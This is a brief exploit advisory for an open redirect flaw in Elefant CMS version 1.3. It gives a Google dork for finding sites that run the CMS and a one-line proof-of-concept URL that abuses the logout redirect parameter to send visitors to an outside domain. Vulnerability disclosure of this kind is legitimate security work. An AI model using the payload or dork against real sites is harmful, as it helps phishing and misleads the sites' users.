Vulnerability title: Elefant CMS Open Redirect
Exploit Author : Ashiyane Digital Security Team
Product: Elefant CMS
Version: 1.3
Google Dork: intext:"Powered by Elefant CMS"
Date: 2015/11/07
Vendor Homepage: http://elefantcms.com/
Download Software: http://elefantcms.com/download
Source: http://ehsansec.ir/files/exploits/elefant-open-redircet.txt
Introduction:
=============
Elefant provides a modern, minimalist user interface that eliminates
clutter and confusion, with a site editor that gets out of your way
and is a pleasure to use. You'll notice right away the attention to
detail throughout the software.
Elefant CMS suffers from an open redirection vulnerability.
PoC:
===
http://localhost/user/logout?redirect=http://ehsansec.ir/
Discovered By:
=============
Ehasn Hosseini (hehsan979@gmail.com)